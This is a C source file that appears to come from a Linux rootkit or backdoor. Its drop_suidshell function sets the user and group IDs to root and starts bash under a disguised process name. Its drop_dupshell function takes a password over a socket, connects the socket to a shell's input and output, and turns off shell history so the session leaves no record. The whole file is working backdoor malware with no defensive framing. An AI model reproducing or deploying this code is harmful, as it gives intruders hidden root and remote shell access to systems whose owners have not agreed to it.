#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>
#include "vars.h"

#define DEBUG 0


void sigchld_handler(int s)
{
	while(waitpid(-1, NULL, WNOHANG) > 0);
}

void drop_suidshell()
{
	setgid(0);
	setuid(0);
	setgroups(0, 0);
			
	unsetenv(ROOT_ENV);
	putenv("HISTFILE=/dev/null");
		
	execl("/bin/bash", PS_PROCESS_NAME, NULL);
	execl("/bin/sh", PS_PROCESS_NAME,  NULL);
}


void perror_exit(int status, const char *s)
{
#if DEBUG > 0
    perror(s);
#endif
    exit(status);
}

void drop_dupshell(int fd)
{
	struct sigaction sa;

	sigemptyset(&sa.sa_mask);
	sa.sa_handler = sigchld_handler;
	sa.sa_flags = SA_RESTART;
	
	if (sigaction(SIGCHLD, &sa, NULL) == -1) 
	{
		perror_exit(0,"sigaction");
	}


	if(fork())
    {
        return;
    }

    // read password
	char buf[1024];
    int n = 0;
    int i = 0;
    do
    {
        if(n == 0)
        {
            write(fd, PROMPT, 2);
            memset(buf, 0, sizeof(buf));
        }

        i = read(fd, buf+n, sizeof(buf) - n - 1);


        if(i <= 0)
        {
            exit(0);
        }

        if(strchr(buf, '\n'))
        {
            *strchr(buf, '\n') = 0;
            if(!strncmp(PASSWORD, buf, strlen(PASSWORD)))
            {
                break;
            }

            n = i = 0;
        }
        else
        {
            n += i;
        }
    } while (1);

	write(fd, "\n", 1);


	dup2(fd, 0);
	dup2(fd, 1);
	dup2(fd, 2);
	
	putenv("HISTFILE=/dev/null");

	execl("/bin/bash", PS_PROCESS_NAME, NULL);
	execl("/bin/sh", PS_PROCESS_NAME, NULL);

	exit(0);
}

